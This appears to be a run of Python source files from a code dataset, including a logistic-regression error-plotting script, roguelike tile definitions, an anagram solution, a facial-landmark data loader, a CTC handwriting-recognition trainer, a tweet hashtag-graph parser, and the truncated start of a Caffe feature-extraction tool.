np.vectorize(sigmoid)\n\n# calculate predicted matrix, round each answer\ntrain_pred = np.dot( X_train, weightMatrix)\nval_pred = np.dot( X_val, weightMatrix)\ntest_pred = np.dot( X_test, weightMatrix)\n\n# pass sigmoid function onto prediction and round\ntrain_pred = np.around(sig_v(train_pred))\nval_pred = np.around(sig_v(val_pred))\ntest_pred = np.around(sig_v(test_pred))\n\n# calculate percent error\ntrain_result = []\nval_result = []\nfor index in range(maxIterations) :\n train_result.append( np.mean( y_train != train_pred[:,index]))\nfor index in range(maxIterations):\n val_result.append(np.mean( y_val != val_pred[:, index]))\ntrain_min_index, train_min_value = min(enumerate(train_result), key=operator.itemgetter(1))\nval_min_index, val_min_value = min(enumerate(val_result), key=operator.itemgetter(1))\n\nprint(train_result)\nprint(val_result)\n\n# graph percent error\nfig = pyplot.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(train_result, \"g-\", label='train')\nax.annotate('train min', xy=(train_min_index, train_min_value), xytext=(train_min_index, train_min_value),\n arrowprops=dict(facecolor='green', shrink=0.05),)\nline2, = ax.plot(val_result, \"r-\", label='validation')\nax.annotate('validation min', xy=(val_min_index, val_min_value), xytext=(val_min_index, val_min_value),\n arrowprops=dict(facecolor='red', shrink=0.05),)\nax.set_ylabel(\"Percent\")\nax.set_xlabel(\"Iterations\")\nax.set_title(\"Percent Error\")\n#ax.set_ylim(0,.8)\nax.legend()\npyplot.show()\n\n# calculate logistic loss\ntrain_loss_results = []\nfor index in range(maxIterations) :\n train_loss_results.append( sklearn.metrics.log_loss( y_train, train_pred[:,index]) )\nval_loss_results = []\nfor index in range(maxIterations):\n val_loss_results.append(sklearn.metrics.log_loss( y_val, val_pred[:, index]))\ntrain_min_index, train_min_value = min(enumerate(train_loss_results), key=operator.itemgetter(1))\nval_min_index, val_min_value = min(enumerate(val_loss_results), key=operator.itemgetter(1))\n\n# plot logistic loss\nfig = pyplot.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(train_loss_results, \"g-\", label='train')\nax.annotate('train min', xy=(train_min_index, train_min_value), xytext=(train_min_index, train_min_value),\n arrowprops=dict(facecolor='green', shrink=0.05),)\nline2, = ax.plot(val_loss_results, \"r-\", label='validation')\nax.annotate('validation min', xy=(val_min_index, val_min_value), xytext=(val_min_index, val_min_value),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n\nax.set_ylabel(\"Loss\")\nax.set_xlabel(\"Iterations\")\nax.set_title(\"Logistic Loss\")\n#ax.set_ylim(0,.8)\nax.legend()\npyplot.show()\n\n# use minimum validation to grab best prediction vector\nbest_tr_pred = train_pred[:,val_min_index]\nbest_va_pred = val_pred[:,val_min_index]\nbest_te_pred = test_pred[:,val_min_index]\n\n# calculate logistic regression train error\ntrain_error = int(np.mean(y_train != best_tr_pred) * 100)\nval_error = int(np.mean(y_val != best_va_pred) * 100)\ntest_error = int(np.mean(y_test != best_te_pred) * 100)\n\n# initalize an empty vector for baseline\nbaseline_train = []\nbaseline_val = []\nbaseline_test = []\n\n# add baseline values to vector\nfor index in range(y_train.shape[0]) :\n if(y_train[index] == 0) :\n baseline_train.append(best_tr_pred[index])\nfor index in range(y_val.shape[0]) :\n if(y_val[index] == 0) :\n baseline_val.append(best_va_pred[index])\nfor index in range(y_test.shape[0]) :\n if(y_test[index] == 0) :\n baseline_test.append(best_te_pred[index])\n\n# create zero vector for y baseline\ny_train_baseline = np.zeros(len(baseline_train))\ny_val_baseline = np.zeros(len(baseline_val))\ny_test_baseline = np.zeros(len(baseline_test))\n\n# calculate baseline error\nbase_train_error = int(np.mean(y_train_baseline != baseline_train)*100)\nbase_val_error = int(np.mean(y_val_baseline != baseline_val)*100)\nbase_test_error = int(np.mean(y_test_baseline != baseline_test)*100)\n\n# create log reg table of errors, baseline errors\nprint(\"{: >11} {: >9} {: >9}\".format(\"\", \"log reg\", \"baseline\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"train\", str(train_error) + \"%\", str(base_train_error) + \"%\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"validation\", str(val_error) + \"%\", str(base_val_error) + \"%\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"test\", str(test_error) + \"%\", str(base_test_error) + \"%\"))\n\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\nfor i in range(y_test.shape[0]):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], X_test[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n# Compute micro-average ROC curve and ROC area\nfpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\nroc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\nplt.figure()\nlw = 2\nplt.plot(fpr[2], tpr[2], color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic example')\nplt.legend(loc=\"lower right\")\nplt.show()","sub_path":"gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"616088306","text":"from typing import Tuple\n\nimport numpy as np\n\ngraphic_dt = np.dtype(\n\t[\n\t\t(\"ch\", np.int32),\n\t\t(\"fg\", \"3B\"),\n\t\t(\"bg\", \"3B\"),\n\t]\n)\n\ntile_dt = np.dtype(\n\t[\n\t\t(\"walkable\", np.bool),\n\t\t(\"transparent\", np.bool),\n\t\t(\"dark\", graphic_dt),\n\t\t(\"light\", graphic_dt),\n\t]\n)\n\ndef new_tile(\n\t*,\n\twalkable: int,\n\ttransparent: int,\n\tdark: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n\tlight: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n) -> np.ndarray:\n\treturn np.array((walkable, transparent, dark, light), dtype=tile_dt)\n\nSHROUD = np.array((ord(\" \"), (255, 255, 255), (0, 0, 0)), dtype=graphic_dt)\n\n# First set of colors is the graphic, second set is the background\n\nfloor = new_tile(\n\twalkable=True,\n\ttransparent=True,\n\tdark=(ord(\".\"), (161, 192, 207), (0, 0, 0)), #50,50,150 light blue\n\tlight=(ord(\".\"), (255, 255, 0), (0, 0, 0)), #200,180,50 light yellow\n)\nwall = new_tile(\n\twalkable=False,\n\ttransparent=False,\n\tdark=(ord(\"#\"), (161, 192, 207), (0, 0, 0)), #0,0,100 dark blue\n\tlight=(ord(\"#\"), (255, 255, 0), (0, 0, 0)), # 130, 110, 50 light yellow\n)","sub_path":"tile_types.py","file_name":"tile_types.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163851567","text":"\"\"\"Question: https://leetcode.com/problems/group-anagrams/\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n from collections import defaultdict\n anagrams = defaultdict(list)\n for word in strs:\n letter_cnt = defaultdict(int)\n for w in word:\n letter_cnt[w] += 1\n anagrams['-'.join(\n '{}:{}'.format(k, v)\n for k, v in sorted(letter_cnt.items()))].append(word)\n return list(anagrams.values())\n\n\nif __name__ == '__main__':\n strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n output = Solution().groupAnagrams(strs)\n print(f'strs: {strs}, output: {output}')\n","sub_path":"49-group-anagrams.py","file_name":"49-group-anagrams.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203210816","text":"from functools import partial\nfrom menpo.shape.pointcloud import PointCloud\nfrom menpofit.builder import compute_reference_shape\nfrom menpofit.builder import rescale_images_to_reference_shape\nfrom menpofit.fitter import (noisy_shape_from_bounding_box, align_shape_with_bounding_box)\nfrom pathlib import Path\n\nimport joblib\nimport menpo.feature\nimport menpo.image\nimport menpo.io as mio\nimport numpy as np\nimport tensorflow as tf\nimport utils\n\n\ndef build_reference_shape(paths, diagonal=200):\n \"\"\"Builds the reference shape.\n\n Args:\n paths: paths that contain the ground truth landmark files.\n diagonal: the diagonal of the reference shape in pixels.\n Returns:\n the reference shape.\n \"\"\"\n landmarks = []\n for path in paths:\n path = Path(path).parent.as_posix()\n landmarks += [group.lms\n for group in mio.import_landmark_files(\n path, verbose=True) if group.lms.n_points == 68]\n\n return compute_reference_shape(landmarks, diagonal=diagonal).points.astype(np.float32)\n\n\ndef grey_to_rgb(im):\n \"\"\"Converts menpo Image to rgb if greyscale\n\n Args:\n im: menpo Image with 1 or 3 channels.\n Returns:\n Converted menpo `Image'.\n \"\"\"\n assert im.n_channels in [1, 3]\n\n if im.n_channels == 3:\n return im\n\n im.pixels = np.vstack([im.pixels] * 3)\n return im\n\n\ndef get_noisy_init_from_bb(reference_shape, bb, noise_percentage=.02):\n \"\"\"Roughly aligns a reference shape to a bounding box.\n\n This adds some uniform noise for translation and scale to the\n aligned shape.\n\n Args:\n reference_shape: a numpy array [num_landmarks, 2]\n bb: bounding box, a numpy array [4, ]\n noise_percentage: noise presentation to add.\n Returns:\n The aligned shape, as a numpy array [num_landmarks, 2]\n \"\"\"\n bb = PointCloud(bb)\n reference_shape = PointCloud(reference_shape)\n\n bb = noisy_shape_from_bounding_box(\n reference_shape, bb, \n noise_percentage=[noise_percentage, 0, noise_percentage]\n ).bounding_box()\n\n return align_shape_with_bounding_box(reference_shape, bb).points\n\n\ndef load_image(path, reference_shape, is_training=False, group='PTS'):\n \"\"\"Load an annotated image.\n\n In the directory of the provided image file, there\n should exist a landmark file (.pts) with the same\n basename as the image file.\n\n Args:\n path: a path containing an image file.\n reference_shape: a numpy array [num_landmarks, 2]\n is_training: whether in training mode or not.\n group: landmark group containing the grounth truth landmarks.\n Returns:\n pixels: a numpy array [width, height, 3].\n estimate: an initial estimate a numpy array [68, 2].\n gt_truth: the ground truth landmarks, a numpy array [68, 2].\n \"\"\"\n im = mio.import_image(path)\n bb_root = im.path.parent.relative_to(im.path.parent.parent.parent)\n if 'set' not in str(bb_root):\n bb_root = im.path.parent.relative_to(im.path.parent.parent)\n\n im.landmarks['bb'] = mio.import_landmark_file(str(Path('bbs') / bb_root / (im.path.stem + '.pts')))\n\n im = im.crop_to_landmarks_proportion(0.3, group='bb')\n reference_shape = PointCloud(reference_shape)\n if np.random.rand() < .5:\n im = utils.mirror_image(im)\n\n bb = im.landmarks['bb'].lms.bounding_box()\n\n im.landmarks['__initial'] = align_shape_with_bounding_box(reference_shape, bb)\n im = im.rescale_to_pointcloud(reference_shape, group='__initial')\n\n lms = im.landmarks[group].lms\n initial = im.landmarks['__initial'].lms\n\n # if the image is greyscale then convert to rgb.\n pixels = grey_to_rgb(im).pixels.transpose(1, 2, 0)\n\n gt_truth = lms.points.astype(np.float32)\n estimate = initial.points.astype(np.float32)\n return pixels.astype(np.float32).copy(), gt_truth, estimate\n\n\ndef distort_color(image, thread_id=0, scope=None):\n \"\"\"Distort the color of the image.\n Each color distortion is non-commutative and thus ordering of the color ops\n matters. Ideally we would randomly permute the ordering of the color ops.\n Rather then adding that level of complication, we select a distinct ordering\n of color ops for each preprocessing thread.\n Args:\n image: Tensor containing single image.\n thread_id: preprocessing thread ID.\n scope: Optional scope for op_scope.\n Returns:\n color-distorted image\n \"\"\"\n with tf.op_scope([image], scope, 'distort_color'):\n color_ordering = thread_id % 2\n\n if color_ordering == 0:\n image = tf.image.random_brightness(image, max_delta=32. / 255.)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n elif color_ordering == 1:\n image = tf.image.random_brightness(image, max_delta=32. / 255.)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n\n # The random_* ops do not necessarily clamp.\n image = tf.clip_by_value(image, 0.0, 1.0)\n return image\n\ndef batch_inputs(paths, reference_shape,\n batch_size=32, is_training=False, num_landmarks=68):\n \"\"\"Reads the files off the disk and produces batches.\n\n Args:\n paths: a list of directories that contain training images and\n the corresponding landmark files.\n reference_shape: a numpy array [num_landmarks, 2]\n batch_size: the batch size.\n is_traininig: whether in training mode.\n num_landmarks: the number of landmarks in the training images.\n Returns:\n images: a tf tensor of shape [batch_size, width, height, 3].\n lms: a tf tensor of shape [batch_size, 68, 2].\n lms_init: a tf tensor of shape [batch_size, 68, 2].\n \"\"\"\n\n files = tf.concat(0, [tf.matching_files(d) for d in paths])\n\n filename_queue = tf.train.string_input_producer(\n files, shuffle=is_training, capacity=1000)\n\n image, lms, lms_init = tf.py_func(\n partial(load_image, is_training=is_training),\n [filename_queue.dequeue(), reference_shape], # input arguments\n [tf.float32, tf.float32, tf.float32], # output types\n name='load_image'\n )\n\n # The image has always 3 channels.\n image.set_shape([None, None, 3])\n\n if is_training:\n image = distort_color(image)\n\n lms = tf.reshape(lms, [num_landmarks, 2])\n lms_init = tf.reshape(lms_init, [num_landmarks, 2])\n\n images, lms, inits = tf.train.batch(\n [image, lms, lms_init],\n batch_size=batch_size,\n num_threads=4,\n capacity=1000,\n enqueue_many=False,\n dynamic_pad=True\n )\n\n return images, lms, inits\n","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"420994703","text":"import sys\n\nimport Levenshtein as leven\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom colorama import Fore\nfrom skimage.color import rgb2gray\nfrom skimage.transform import rotate\nfrom torch import nn, optim\nfrom torch.utils.data import SubsetRandomSampler, DataLoader\nfrom tqdm import tqdm\n\nfrom dataset import IAMData\nfrom model import IAMModel\n\nnp.random.seed(42)\ntorch.manual_seed(42)\ndev = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# ============================================= PREPARING DATASET ======================================================\ndataset = IAMData(txt_file='./dataset/lines.txt',\n root_dir='./dataset',\n output_size=(64, 800),\n border_pad=(4, 10))\n\nclasses = ''.join(dataset.char_dict.keys())\ntext_file = open(\"chars.txt\", \"w\", encoding='utf-8')\ntext_file.write('\\n'.join([x if x != '#' else '\\\\#' for x in dataset.char_dict.keys()]))\ntext_file.close()\n\n\ndef collate(batch):\n images, words = [b.get('image') for b in batch], [b.get('word') for b in batch]\n images = torch.stack(images, 0)\n # Calculate target lengths for the current batch\n lengths = [len(word) for word in words]\n # According to https://pytorch.org/docs/stable/generated/torch.nn.CTCLoss.html\n # Tensor of size sum(target_lengths) the targets are assumed to be un-padded and concatenated within 1 dimension.\n targets = torch.empty(sum(lengths)).fill_(len(classes)).long()\n lengths = torch.tensor(lengths)\n # Now we need to fill targets according to calculated lengths\n for j, word in enumerate(words):\n start = sum(lengths[:j])\n end = lengths[j]\n targets[start:start + end] = torch.tensor([dataset.char_dict.get(letter) for letter in word]).long()\n return images.to(dev), targets.to(dev), lengths.to(dev)\n\n\n# ================================================= MODEL ==============================================================\nmodel = IAMModel(time_step=96,\n feature_size=512,\n hidden_size=512,\n output_size=len(classes) + 1,\n num_rnn_layers=4)\nmodel.to(dev)\n\n\n# ================================================ TRAINING MODEL ======================================================\ndef fit(model, epochs, train_data_loader, valid_data_loader, lr=1e-3, wd=1e-2, betas=(0.9, 0.999)):\n best_leven = 1000\n opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr,\n weight_decay=wd, betas=betas)\n opt.zero_grad(set_to_none=False)\n len_train = len(train_data_loader)\n loss_func = nn.CTCLoss(reduction='sum', zero_infinity=True, blank=len(classes))\n for i in range(1, epochs + 1):\n # ============================================ TRAINING ========================================================\n batch_n = 1\n train_levenshtein = 0\n len_levenshtein = 0\n for xb, yb, lens in tqdm(train_data_loader,\n position=0, leave=True,\n file=sys.stdout, bar_format=\"{l_bar}%s{bar}%s{r_bar}\" % (Fore.GREEN, Fore.RESET)):\n model.train()\n # And the lengths are specified for each sequence to achieve masking\n # under the assumption that sequences are padded to equal lengths.\n input_lengths = torch.full((xb.size()[0],), model.time_step, dtype=torch.long)\n loss_func(model(xb).log_softmax(2).requires_grad_(), yb, input_lengths, lens).backward()\n opt.step()\n opt.zero_grad(set_to_none=False)\n # ================================== TRAINING LEVENSHTEIN DISTANCE =========================================\n if batch_n > (len_train - 5):\n model.eval()\n with torch.no_grad():\n decoded = model.beam_search_with_lm(xb)\n for j in range(0, len(decoded)):\n # We need to find actual string somewhere in the middle of the 'targets'\n # tensor having tensor 'lens' with known lengths\n actual = yb.cpu().numpy()[0 + sum(lens[:j]): sum(lens[:j]) + lens[j]]\n train_levenshtein += leven.distance(''.join([letter for letter in decoded[j]]), ''.join([decode_map.get(letter.item()) for letter in actual[:]]))\n len_levenshtein += sum(lens).item()\n\n batch_n += 1\n\n # ============================================ VALIDATION ======================================================\n model.eval()\n with torch.no_grad():\n val_levenshtein = 0\n target_lengths = 0\n for xb, yb, lens in tqdm(valid_data_loader,\n position=0, leave=True,\n file=sys.stdout, bar_format=\"{l_bar}%s{bar}%s{r_bar}\" % (Fore.BLUE, Fore.RESET)):\n decoded = model.beam_search_with_lm(xb)\n for j in range(0, len(decoded)):\n actual = yb.cpu().numpy()[0 + sum(lens[:j]): sum(lens[:j]) + lens[j]]\n val_levenshtein += leven.distance(''.join([letter for letter in decoded[j]]), ''.join([decode_map.get(letter.item()) for letter in actual[:]]))\n target_lengths += sum(lens).item()\n\n print('epoch {}: Train Levenshtein {} | Validation Levenshtein {}'\n .format(i, train_levenshtein / len_levenshtein, val_levenshtein / target_lengths), end='\\n')\n # ============================================ SAVE MODEL ======================================================\n if (val_levenshtein / target_lengths) < best_leven:\n torch.save(model.state_dict(), f=str((val_levenshtein / target_lengths) * 100).replace('.', '_') + '_' + 'model.pth')\n best_leven = val_levenshtein / target_lengths\n\n\ntrain_batch_size = 60\nvalidation_batch_size = 40\ndataset_size = len(dataset)\nindices = list(range(dataset_size))\nsplit = int(np.floor(0.2 * dataset_size))\ndecode_map = {v: k for k, v in dataset.char_dict.items()}\nnp.random.shuffle(indices)\ntrain_indices, val_indices = indices[split:], indices[:split]\n\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(val_indices)\n\ntrain_loader = DataLoader(dataset, batch_size=train_batch_size, sampler=train_sampler, collate_fn=collate)\nvalidation_loader = DataLoader(dataset, batch_size=validation_batch_size, sampler=valid_sampler, collate_fn=collate)\nprint(\"Training...\")\nfit(model=model, epochs=22, train_data_loader=train_loader, valid_data_loader=validation_loader)\n\n\n# ============================================ TESTING =================================================================\ndef batch_predict(model, valid_dl, up_to):\n xb, yb, lens = iter(valid_dl).next()\n model.eval()\n with torch.no_grad():\n outs = model.beam_search_with_lm(xb)\n for i in range(len(outs)):\n start = sum(lens[:i])\n end = lens[i].item()\n corr = ''.join([decode_map.get(letter.item()) for letter in yb[start:start + end]])\n predicted = ''.join([letter for letter in outs[i]])\n # ============================================ SHOW IMAGE ==================================================\n img = xb[i, :, :, :].permute(1, 2, 0).cpu().numpy()\n img = rgb2gray(img)\n img = rotate(img, angle=90, clip=False, resize=True)\n f, ax = plt.subplots(1, 1)\n mpl.rcParams[\"font.size\"] = 8\n ax.imshow(img, cmap='gray')\n mpl.rcParams[\"font.size\"] = 14\n plt.gcf().text(x=0.1, y=0.1, s=\"Actual: \" + str(corr))\n plt.gcf().text(x=0.1, y=0.2, s=\"Predicted: \" + str(predicted))\n f.set_size_inches(10, 3)\n print('actual: {}'.format(corr))\n print('predicted: {}'.format(predicted))\n if i + 1 == up_to:\n break\n plt.show()\n\n\nbatch_predict(model=model, valid_dl=validation_loader, up_to=20)\n","sub_path":"iam.py","file_name":"iam.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84512961","text":"import re\nimport datetime\nfrom collections import deque\nimport sys, getopt\n\nclass Node:\n\tdef __init__(self, name=None):\n\t\tself.neighbors = {}\n\t\tself.date_added = {}\n\t\tself.name = name\n\n\t\n\tdef addNeighbor(self, name, node):\n\t\tif name not in self.neighbors:\n\t\t\tself.neighbors[name] = node\n\n\tdef removeNeighbors(self, list_datetime, node_set):\n\t\tif node_set:\n\t\t\tlast_node = self.neighbors[node_set[-1]]\n\t\telse:\n\t\t\treturn;\n\n\t\tfor node_name in node_set:\n\t\t\tnode = self.neighbors[node_name]\n\t\t\t# Get the datetime from the node\n\t\t\tlast_modified_date = self.date_added[node_name]\n\t\t\t#If the date outside of our window is the date that the node's edge was last modified, remove it\n\t\t\tif last_modified_date == list_datetime:\n\t\t\t\t#Delete this nodes ref to the other node\n\t\t\t\tdel self.date_added[node_name]\n\t\t\t\tdel self.neighbors[node_name]\n\t\t\t\t#Delete the other nodes ref to this node\n\t\t\t\tdel node.date_added[self.name]\n\t\t\t\tdel node.neighbors[self.name]\n\t\t\t\t#Tell the caller that we deleted\n\n\t\t#Remove the node we are about to traverse to\n\t\tnode_set.pop()\n\n\t\t#Cal removeNeighbors on the next node\n\t\tlast_node.removeNeighbors(list_datetime, node_set)\n\n\tdef addNeighbors(self, curr_datetime, nodes):\n\t\tif nodes:\n\t\t\tlast_node = nodes[-1]\n\t\telse:\n\t\t\treturn;\n\n\t\tfor node in nodes:\n\t\t\t#If the edge already exists, we update the dates added\n\n\t\t\tif node.name in self.neighbors:\n\t\t\t\tself.date_added[node.name] = curr_datetime\n\t\t\t\tnode.date_added[self.name] = curr_datetime\n\t\t\t#Otherwise, we add the connection between the two nodes and add the dates\n\t\t\telse:\n\t\t\t\tself.date_added[node.name] = curr_datetime\n\t\t\t\tnode.date_added[self.name] = curr_datetime\n\n\t\t\t\tself.neighbors[node.name] = node\n\t\t\t\tnode.neighbors[self.name] = self\n\n\t\t#Remove the node we are about to traverse to\n\t\tnodes.pop()\n\n\t\t#Call removeNeighbors on the next node\n\t\tlast_node.addNeighbors(curr_datetime, nodes) \n \n\tdef __getitem__(self, key):\n\t\treturn self.neighbors[key]\n\nclass RollingAverageParser:\n\tdef __init__(self, filename, outfile_name):\n\t\t#hashtag -> Node\n\t\tself.hashtag_map = {}\n\n\t\t#datestring -> List of Nodes\n\t\tself.date_map = {}\n\n\t\t#List of dates\n\t\tself.included_dates = []\n\n\t\t#The generated output from the \n\t\tself.tweetfile = open(filename)\n\n\t\tself.outfile_name = outfile_name\n\n\tdef parse_datetime(self, tweet):\n\t\tif tweet:\n\t\t\tr = re.search(\"timestamp: \", tweet)\n\t\t\tif r:\n\t\t\t\tend = r.end()\n\t\t\t\tdatetime = tweet[end:-2]\n\t\t\t\treturn datetime\n\n\t\treturn None\n\n\tdef parse_hashtags(self, tweet):\n\t\tif tweet:\n\t\t\thashtags = {tag.strip(\"#\") for tag in tweet.split() if tag.startswith(\"#\")}\n\t\t\thashtags = set([x.lower() for x in hashtags])\n\t\t\t#print hashtags\n\t\t\treturn hashtags\n\n\t\treturn None\n\n\tdef remove_from_window(self, list_datetime):\n\t\tif list_datetime in self.date_map:\n\t\t\t# Get the nodes that were added/updated on this date\n\t\t\tnode_set = list(self.date_map[list_datetime])\n\n\t\t\t#Get the first node\n\t\t\tfirst_node = self.hashtag_map[node_set.pop()]\n\n\n\t\t\t#Tell the first node to remove all its matching neighbors\n\t\t\tfirst_node.removeNeighbors(list_datetime,node_set)\n\n\t\t\t#If the node has no neighbors, remove them permanently\n\t\t\tnode_set_a = list(self.date_map[list_datetime])\n\n\t\t\tfor node_name in node_set_a:\n\t\t\t\tif len(self.hashtag_map[node_name].neighbors) is 0:\n\t\t\t\t\tdel self.hashtag_map[node_name]\n\n\t\t\t#At this point, we have removed all edges added on the specified date, so we can remove the date_map entry\n\t\t\tdel self.date_map[list_datetime]\n\n\tdef get_weight(self):\n\t\tweight = 0\n\t\tdenom = len(self.hashtag_map)\n\t\t# print \"THe number of nodes is: \" + str(denom)\n\t\t# print '\\n'\n\t\tif denom is 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\tfor key,value in self.hashtag_map.iteritems():\n\t\t\t\t# print \"For the key: \" + str(key) + \" the number of neighbors is: \" + str(len(value.neighbors))\n\t\t\t\t# for k1,node in value.neighbors.iteritems():\n\t\t\t\t# print str(k1)\n\t\t\t\tweight += len(value.neighbors) \n\n\t\t\ttotal_weight = weight / float(denom)\n\t\t\treturn round(total_weight,2)\n\n\n\tdef read_tweets(self):\n\t\twith open(self.outfile_name, 'w') as outfile:\n\t\t\tfor tweet in self.tweetfile:\n\t\t\t\tdatetime_str = self.parse_datetime(tweet)\n\n\t\t\t\tif not datetime_str:\n\t\t\t\t\tcontinue;\n\n\t\t\t\thashtags = self.parse_hashtags(tweet)\n\t\t\t\tcurrent_datetime = datetime.datetime.strptime(datetime_str,'%a %b %d %H:%M:%S +0000 %Y') - datetime.timedelta(0,60)\n\t\t\t\tnum_dates_removed = 0\n\t\t\t\tfor date in self.included_dates:\n\t\t\t\t\tlist_datetime = datetime.datetime.strptime(date,'%a %b %d %H:%M:%S +0000 %Y')\n\n\t\t\t\t\t#if the value is outside of our window\n\t\t\t\t\tif current_datetime > list_datetime:\n\t\t\t\t\t\tself.remove_from_window(date)\n\t\t\t\t\t\tnum_dates_removed += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t#Remove the dates that are outside of the window\n\t\t\t\tif num_dates_removed:\n\t\t\t\t\tself.included_dates = self.included_dates[num_dates_removed:]\n\t\t\t\t\tnum_dates_removed = 0\n\n\t\t\t\t#Add or update the tree with the hashtags of the tweets we are currently looking at\n\t\t\t\tif hashtags and len(hashtags) > 1:\n\t\t\t\t\tself.date_map[datetime_str] = hashtags\n\t\t\t\t\tself.included_dates.append(datetime_str)\t\t\t\n\n\t\t\t\t\tcurrent_nodes = []\n\t\t\t\t\t#Add the new nodes to a temp list\n\t\t\t\t\tfor tag in hashtags:\n\t\t\t\t\t\tif tag in self.hashtag_map: \n\t\t\t\t\t\t\tcurrent_nodes.append(self.hashtag_map[tag])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnew_node = Node(tag)\n\t\t\t\t\t\t\tcurrent_nodes.append(new_node)\n\t\t\t\t\t\t\tself.hashtag_map[tag] = new_node\t\t\t\n\n\t\t\t\t\t#Tell the first node to start adding neighbors based on the passed in list\n\t\t\t\t\tfirst_node = current_nodes.pop()\n\t\t\t\t\tfirst_node.addNeighbors(datetime_str, current_nodes)\n\n\t\t\t\t#Calculate the weight once the tree has finished being parsed\n\t\t\t\tweight = self.get_weight()\n\t\t\t\toutfile.write(str(weight) + '\\n')\n\n\ndef main(argv):\n\n\tpath = argv[1]\n\toutfile = argv[2]\n\n\trap = RollingAverageParser(path, outfile)\n\trap.read_tweets()\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n","sub_path":"src/average_degree.py","file_name":"average_degree.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109201103","text":"#!/usr/bin/env python2\n\"\"\"Feature extraction with Caffe python wrapper.\n\nCommand Line Usage: python feature_extraction.py net.prototxt .caffemodel mean.npy file_list.txt output_name \\\n-m mode -g gpu_num -l layer -b batch_size\nmode: {\"single\", \"multi\"}, optional.\ngpu_num: the total number of used gpu if mode = \"multi\", or the gpu device number if mode = \"single\", optional.\nlayer: the CaffeNet layer, optional.\nbatch size: the CaffeNet batch size, optional.\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport os\nimport traceback\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import ImageFile\nimport multiprocessing\nimport caffe\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef read_file_list(file_list):\n \"\"\"Read file_list.\n \n Remove labels in the .txt file and return an image path list.\n \n :param file_list: a .txt file path.\n :return: a list contains all image paths.\n \"\"\"\n image_list = []\n try:\n with open(file_list) as f:\n image_list = [line.strip().split()[0] for line in f]\n except IOError as e:\n print(repr(e))\n else:\n print(\"total %d images\" % len(image_list))\n finally:\n return image_list\n\n\ndef layer_shape(model_def, model_weights):\n \"\"\"Show layers shape.\n \n For each layer, let's look at the activation shapes,\n which typically have the form (batch_size, channel_dim, height, width).\n The activations are exposed as an OrderedDict, net.blobs.\n \n :param model_def: a net.prototxt file path.\n :param model_weights: a .caffemodel file path.\n :return: None.\n \"\"\"\n caffe.set_mode_cpu()\n net = caffe.Net(model_def, model_weights, caffe.TEST)\n # for each layer, show the output shape\n for layer_name in net.blobs:\n print(\"{}\\t{}\".format(layer_name, str(net.blobs[layer_name].data.shape)))\n\n\ndef vis_square(data):\n \"\"\"Take an array of shape (n, height, width) or (n, height, width, 3)\n and visualize each (height, width) thing in a grid of size approx. sqrt(n) by sqrt(n)\"\"\"\n # normalize data for display\n data = (data - data.min()) / (data.max() - data.min())\n # force the number of filters to be square\n n = int(np.ceil(np.sqrt(data.shape[0])))\n padding = (((0, n ** 2 - data.shape[0]),\n (0, 1), (0, 1)) # add some space between filters\n + ((0, 0),) * (data.ndim - 3)) # don't pad the last dimension (if there is one)\n data = np.pad(data, padding, mode='constant', constant_values=1) # pad with ones (white)\n # tile the filters into an image\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\n data = data.reshape((n * 